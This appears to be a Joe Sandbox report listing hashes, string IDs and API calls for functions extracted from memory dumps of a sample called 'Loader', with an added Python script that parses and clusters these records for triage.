                                                                                        • Opcode Fuzzy Hash: bb51691f9dde2279535c869879990e0e1ffd92db3571b05c63e2572ef1324b61
                                                                                        • Instruction Fuzzy Hash: 83713579A0C3409FD724CF18EC41BABB7E4EB86308F50493EF59997282D774A905CB96
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: _q0s$gfff
                                                                                        • API String ID: 0-1196501146
                                                                                        • Opcode ID: bbe2847cc035eb94d765ed87b187a5de19f998dd8160d28f4ca51f335dabcf03
                                                                                        • Instruction ID: 9ac1f0c1fc7a49e8154fcc72e3c80d4cb5b55f6ce251fccbb0b8a1824a22e975
                                                                                        • Opcode Fuzzy Hash: bbe2847cc035eb94d765ed87b187a5de19f998dd8160d28f4ca51f335dabcf03
                                                                                        • Instruction Fuzzy Hash: 3E71B2726093508BC724DF25C8622EB77E2FFD5364F188A2DD8998B395E7388941C786
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: gy${
                                                                                        • API String ID: 0-2069607922
                                                                                        • Opcode ID: da2f2a0c6207235e0a990dccae0dbce93f9678055be0d1fcb7fe1bdd5a6a2c50
                                                                                        • Instruction ID: 431e554adce80ef47d4d1f40f80e38f5c8695c8e2ce9c58edc59fdf38191c638
                                                                                        • Opcode Fuzzy Hash: da2f2a0c6207235e0a990dccae0dbce93f9678055be0d1fcb7fe1bdd5a6a2c50
                                                                                        • Instruction Fuzzy Hash: 3331FFB02883948FD3508F119C80B6FBBF1FBC6714F149A6CE6D1AB291C77990468B0A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: bmy
                                                                                        • API String ID: 0-4149787075
                                                                                        • Opcode ID: 61d022077e6a2341986c098e972a1cb8eef2a13e135f4d275527c5a816620eb6
                                                                                        • Instruction ID: f5ab0193b59fe8e79b319db8544de2e2decb58f69456fbb9bb30fc882693dbd0
                                                                                        • Opcode Fuzzy Hash: 61d022077e6a2341986c098e972a1cb8eef2a13e135f4d275527c5a816620eb6
                                                                                        • Instruction Fuzzy Hash: 76C25676D022698FCB18DFA9D4921ECBBF1FF68314B14816AD4A5E7784E3385A81CF50
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID: f
                                                                                        • API String ID: 2994545307-1993550816
                                                                                        • Opcode ID: c7c0c1f47888a00f76dfdd9b993ea855ebbf2e381001f44f89dc36debc6416fd
                                                                                        • Instruction ID: fe604cc3133df0d3ef17166e2c6d21145ffaf46a9ca28f7e45b4cb97c9031a62
                                                                                        • Opcode Fuzzy Hash: c7c0c1f47888a00f76dfdd9b993ea855ebbf2e381001f44f89dc36debc6416fd
                                                                                        • Instruction Fuzzy Hash: 632213756083418FD714CF19C880B2BB7E2EBC9318F199A6EE595873A1D734EC01CB96
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: "C
                                                                                        • API String ID: 0-2206442469
                                                                                        • Opcode ID: 318cf19dad6bd902ed9746a2d1b6ba562f171c8a02b36b8081c52eebcdc19270
                                                                                        • Instruction ID: cc3b19862de00450c502d71b80b37b6a0facead2af28862af59a70b515e96c0c
                                                                                        • Opcode Fuzzy Hash: 318cf19dad6bd902ed9746a2d1b6ba562f171c8a02b36b8081c52eebcdc19270
                                                                                        • Instruction Fuzzy Hash: EA22F479B18111CFCB08CF38E8906AAB7A2FF8A315F1985BDD54697395C7349852CB44
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: "C
                                                                                        • API String ID: 0-2206442469
                                                                                        • Opcode ID: c745bed812c72e11a2f85d115635a27e4d80eed790739967119487ee27e1db50
                                                                                        • Instruction ID: 7582ed78cd08e368e7f7bf7a7ebd23f02f26f556a500b2e852d8dce14501ab51
                                                                                        • Opcode Fuzzy Hash: c745bed812c72e11a2f85d115635a27e4d80eed790739967119487ee27e1db50
                                                                                        • Instruction Fuzzy Hash: EE02F339B18211CFCB08CF38E8906AAB7B2FF8A315F1989BDD54697395C7349842CB44
                                                                                        APIs
                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,011CF70C,?,?,00000008,?,?,011CF30F,00000000), ref: 011CF93E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionRaise
                                                                                        • String ID:
                                                                                        • API String ID: 3997070919-0
                                                                                        • Opcode ID: 70031fc36e5d33b4dfa49f389e82c6349f1e198425c5f3dab4e7705bf089505f
                                                                                        • Instruction ID: 2bdad6668afa3a5aaddd90eea9fb85881586f42832ba92e25a44ecb80c80b042
                                                                                        • Opcode Fuzzy Hash: 70031fc36e5d33b4dfa49f389e82c6349f1e198425c5f3dab4e7705bf089505f
                                                                                        • Instruction Fuzzy Hash: 16B16C3161060A9FEB19CF2CC48ABA57FA1FF15764F25865CE999CF2A1C335D982CB40
                                                                                        APIs
                                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 011C4A6B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: FeaturePresentProcessor
                                                                                        • String ID:
                                                                                        • API String ID: 2325560087-0
                                                                                        • Opcode ID: fa33ad3d69aef539fd0b8ca3bead3655fb4b406a62f9a2a97dbf59b91084de55
                                                                                        • Instruction ID: 34d989726f1e9d5d23f47a0493165737d3791f33d8df0aac758ce42d3498d033
                                                                                        • Opcode Fuzzy Hash: fa33ad3d69aef539fd0b8ca3bead3655fb4b406a62f9a2a97dbf59b91084de55
                                                                                        • Instruction Fuzzy Hash: A8A188B5A066458FDB2CCF68D4917ADBBB0FB59728F14816ED525E77C8C334A880CB50
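Every record in this listing is one function the sandbox's IDA plugin lifted from a process dump: the dump it came from (note that the same process, prefix 00000001.00000002, yields functions from two PE images, one based at 00400000 and one at 00EF0000), the Windows APIs it calls with their call-site addresses, and two content hashes (Opcode ID, which the report also prints as Opcode Fuzzy Hash, and Instruction Fuzzy Hash). Joe Sandbox does not document the fuzzy-hash format, so offline the most one can do is compare hashes positionally. The Python below is an added example, not code from the Joe Sandbox report or the vendor: it parses records in exactly the layout shown on this page, indexes API call sites by image base, flags rows whose Opcode ID is malformed or disagrees with the Opcode Fuzzy Hash column, and clusters functions whose Instruction Fuzzy Hash differs in at most 12 hex digits. The digit-wise distance and the 12-digit threshold are my assumptions, not the vendor's similarity metric; the sample input is three records copied from this page with the Associated, plugin and Instruction ID lines left out.

```python
import re
from collections import defaultdict

# Constructed sample: three records copied from the report above (Associated, plugin and Instruction ID lines omitted).
SAMPLE = """\
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,011CF70C,?,?,00000008,?,?,011CF30F,00000000), ref: 011CF93E
Memory Dump Source
• Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
• Opcode ID: 70031fc36e5d33b4dfa49f389e82c6349f1e198425c5f3dab4e7705bf089505f
• Opcode Fuzzy Hash: 70031fc36e5d33b4dfa49f389e82c6349f1e198425c5f3dab4e7705bf089505f
• Instruction Fuzzy Hash: 16B16C3161060A9FEB19CF2CC48ABA57FA1FF15764F25865CE999CF2A1C335D982CB40
Strings
Memory Dump Source
• Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• API ID:
• String ID: "C
• API String ID: 0-2206442469
• Opcode ID: 318cf19dad6bd902ed9746a2d1b6ba562f171c8a02b36b8081c52eebcdc19270
• Opcode Fuzzy Hash: 318cf19dad6bd902ed9746a2d1b6ba562f171c8a02b36b8081c52eebcdc19270
• Instruction Fuzzy Hash: EA22F479B18111CFCB08CF38E8906AAB7A2FF8A315F1985BDD54697395C7349852CB44
Memory Dump Source
• Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• API ID:
• String ID: "C
• API String ID: 0-2206442469
• Opcode ID: c745bed812c72e11a2f85d115635a27e4d80eed790739967119487ee27e1db50
• Opcode Fuzzy Hash: c745bed812c72e11a2f85d115635a27e4d80eed790739967119487ee27e1db50
• Instruction Fuzzy Hash: EE02F339B18211CFCB08CF38E8906AAB7B2FF8A315F1989BDD54697395C7349842CB44
"""

FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")
API_RE = re.compile(r"^•\s*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)$")
OFFSET_RE = re.compile(r"Offset:\s*([0-9A-Fa-f]+)")
HEADINGS = {"Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

def parse_records(text):
    """One dict per function; a record ends at its "Instruction Fuzzy Hash" line."""
    records, cur, section = [], {"apis": [], "strings": []}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in ("APIs", "Strings"):           # list sections preceding the record body
            section = line.lower()
            continue
        if line in HEADINGS or not line.startswith("•"):
            section = None
            continue
        if section == "apis" and (m := API_RE.match(line)):
            cur["apis"].append({"api": m[1], "module": m[2], "args": m[3], "ref": m[4]})
            continue
        if section == "strings":
            cur["strings"].append(line.lstrip("• "))
            continue
        if not (m := FIELD_RE.match(line)):
            continue
        key, value = m[1].strip(), m[2].strip()
        if key == "Source File":                  # image base the function was lifted from
            cur["image_base"] = int(OFFSET_RE.search(value)[1], 16)
        cur[key] = value
        if key == "Instruction Fuzzy Hash":       # last field of every record
            records.append(cur)
            cur, section = {"apis": [], "strings": []}, None
    return records

def nibble_distance(a, b):
    """Count of differing hex digits. Assumption: Joe Sandbox does not document its
    fuzzy-hash format, so this positional count is a heuristic, not the vendor's metric."""
    if len(a) != len(b):
        raise ValueError("fuzzy hashes differ in length")
    return sum(x != y for x, y in zip(a.upper(), b.upper()))

def cluster_by_fuzzy_hash(records, max_distance=12):
    """Greedy single-linkage clustering on Instruction Fuzzy Hash (threshold is an assumption)."""
    clusters = []
    for rec in records:
        h = rec["Instruction Fuzzy Hash"]
        for cl in clusters:
            if any(nibble_distance(h, o["Instruction Fuzzy Hash"]) <= max_distance for o in cl):
                cl.append(rec)
                break
        else:
            clusters.append([rec])
    return clusters

def api_index(records):
    """API name -> [(image_base, call-site address)]: which image calls what, and where."""
    out = defaultdict(list)
    for rec in records:
        for call in rec["apis"]:
            out[call["api"]].append((rec["image_base"], call["ref"]))
    return dict(out)

def check_invariants(records):
    """Opcode IDs that are not 64 hex digits or that disagree with the Opcode Fuzzy Hash column."""
    return [r.get("Opcode ID") for r in records
            if not re.fullmatch(r"[0-9a-f]{64}", r.get("Opcode ID", ""))
            or r["Opcode ID"] != r.get("Opcode Fuzzy Hash")]
```

Run on the full page text, `cluster_by_fuzzy_hash` groups the 00400000 functions that share String ID `"C` into one cluster (their Instruction Fuzzy Hashes differ in only a handful of digits), while the RaiseException and IsProcessorFeaturePresent functions from the 00EF0000 image stay apart; `api_index` is the quickest way to see which image actually reaches the imports the report lists. Treat the cluster output as a triage hint only, since the threshold was picked by eye against this page and the hash format is opaque.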
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: "C
                                                                                        • API String ID: 0-2206442469
                                                                                        • Opcode ID: da03289935d2a365dedf4cbe9730c3ecdc5a79b854c84855746c9a427666edbc
                                                                                        • Instruction ID: f391942a458117ab2eff221fcfc61aedbfa58ea332473f0907b71af19172290f
                                                                                        • Opcode Fuzzy Hash: da03289935d2a365dedf4cbe9730c3ecdc5a79b854c84855746c9a427666edbc
                                                                                        • Instruction Fuzzy Hash: 89E1E239B18211CFCB08CF29D8916AEB7B2FF8A315F1986BDD50697395C7349852CB84
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: pq
                                                                                        • API String ID: 0-1239689891
                                                                                        • Opcode ID: 8f7d284124c82df3290142075c504644928a384a95776854a061d4f458ab5068
                                                                                        • Instruction ID: 500f681a5dc29514dd64ddcd126b613fb850ea0849f1361138090b14647004ae
                                                                                        • Opcode Fuzzy Hash: 8f7d284124c82df3290142075c504644928a384a95776854a061d4f458ab5068
                                                                                        • Instruction Fuzzy Hash: 3FC1F1B5A183108BD724CF28C8917ABB3F2EF95314F08892DE8C58B395E738D945C75A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: "C
                                                                                        • API String ID: 0-2206442469
                                                                                        • Opcode ID: 93cfdb384fbbcdf934b2e1f9f719d80038c7b1012457b02cac8aa074438e88da
                                                                                        • Instruction ID: 13288392fc325517df86cad4ade3bbe7b083210dd55d9389e011795523972a75
                                                                                        • Opcode Fuzzy Hash: 93cfdb384fbbcdf934b2e1f9f719d80038c7b1012457b02cac8aa074438e88da
                                                                                        • Instruction Fuzzy Hash: A1D1E236B18211CFCB08CF29D8916AEB7B2FB8A315F1986BDD54697395C7349C02CB94
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: "C
                                                                                        • API String ID: 0-2206442469
                                                                                        • Opcode ID: 9bbcde8f8e236cf10bfcc444cae987d80eafb99731bf26b6d9bde5d12487c25a
                                                                                        • Instruction ID: c02c92b643ec8d6061b0b585771056a8a7c41fa14bd75fb70af057f1c39578d8
                                                                                        • Opcode Fuzzy Hash: 9bbcde8f8e236cf10bfcc444cae987d80eafb99731bf26b6d9bde5d12487c25a
                                                                                        • Instruction Fuzzy Hash: 86D1F135A18215CFCB08CF39D8912BEBBB2FB8A315F1986BDD44297381C7349802CB94
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: :
                                                                                        • API String ID: 0-336475711
                                                                                        • Opcode ID: d4da6a1f1a33f302b28b3d272f302cdbfe495a8cad6bdfe1330f27f80afea027
                                                                                        • Instruction ID: 45885d3b4d1d012f206d53a257d01764ec68dfae15cf9f6058a92df6a7d4df09
                                                                                        • Opcode Fuzzy Hash: d4da6a1f1a33f302b28b3d272f302cdbfe495a8cad6bdfe1330f27f80afea027
                                                                                        • Instruction Fuzzy Hash: C3D1483AA24222CBCB148FB8D9411AFB3B1FF4A311F1A8879C941A7394D7799D52C794
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: "
                                                                                        • API String ID: 0-123907689
                                                                                        • Opcode ID: 91379af672f1dbe31fa7d13f69b6f352546ad0d77617e07e08176a71aae7ab56
                                                                                        • Instruction ID: 5488062bd572d25524ecec9402af32519797fcb3431be29340e35f15c478a4d7
                                                                                        • Opcode Fuzzy Hash: 91379af672f1dbe31fa7d13f69b6f352546ad0d77617e07e08176a71aae7ab56
                                                                                        • Instruction Fuzzy Hash: 2FD116B2B083249FC714DE15E48076BB7EAEF84314F48856EE9998B382D738DD4487D6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID: <
                                                                                        • API String ID: 2994545307-4251816714
                                                                                        • Opcode ID: 9eff7890b7abb3a006f2c2d0c5a801ffc39c4971112778df707c3dff6546adfd
                                                                                        • Instruction ID: bc8ced4a158fefc9f1f828ddbeaf2a6aa2fbb25641fc4c758a13245c578b86aa
                                                                                        • Opcode Fuzzy Hash: 9eff7890b7abb3a006f2c2d0c5a801ffc39c4971112778df707c3dff6546adfd
                                                                                        • Instruction Fuzzy Hash: 15A19A766082508FD328CB24C8917BBB7D2EBCA304F1A897ED4D5D7252D738D841CB6A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711904877.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711885433.0000000000EF0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000001.00000002.2712181197.00000000011D1000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000001.00000002.2712202246.00000000011D7000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000001.00000002.2712222775.00000000011D9000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7c6afe46916d1f3de16385360326b4e34759b009bcbef1d0834a3ae96c14b987
                                                                                        • Instruction ID: 68d9164682cad4aefab8f3bc5f6754e5bb5d720af1c77e568428de411a4f72f2
                                                                                        • Opcode Fuzzy Hash: 7c6afe46916d1f3de16385360326b4e34759b009bcbef1d0834a3ae96c14b987
                                                                                        • Instruction Fuzzy Hash: ED31B27690021DAFDB28DEBDCCC8DAEB76EEB94718F144199E91597284EB309D408B60
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: rt
                                                                                        • API String ID: 0-702342736
                                                                                        • Opcode ID: 1605de470e2b15ba7f14b5bab545798554ec421646854cba13ad9437dbebe96f
                                                                                        • Instruction ID: 0dc673b11f2f29cf9410cafdc44ae5b0865e538447e6119a8d8e6fbf35fadf0c
                                                                                        • Opcode Fuzzy Hash: 1605de470e2b15ba7f14b5bab545798554ec421646854cba13ad9437dbebe96f
                                                                                        • Instruction Fuzzy Hash: DFB11676908351CBC720CF29C8807AB77E1EFC5364F198A6EE8C98B351E7349942CB56
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ,
                                                                                        • API String ID: 0-3772416878
                                                                                        • Opcode ID: 697b2ba8bb72cb3d0de071efa58bd3f0d967c93cefef912759de0d6da7d3f539
                                                                                        • Instruction ID: a478b9cc30ed764529248bf8faf02e780253ee7d6c10264c25d16e611a95a898
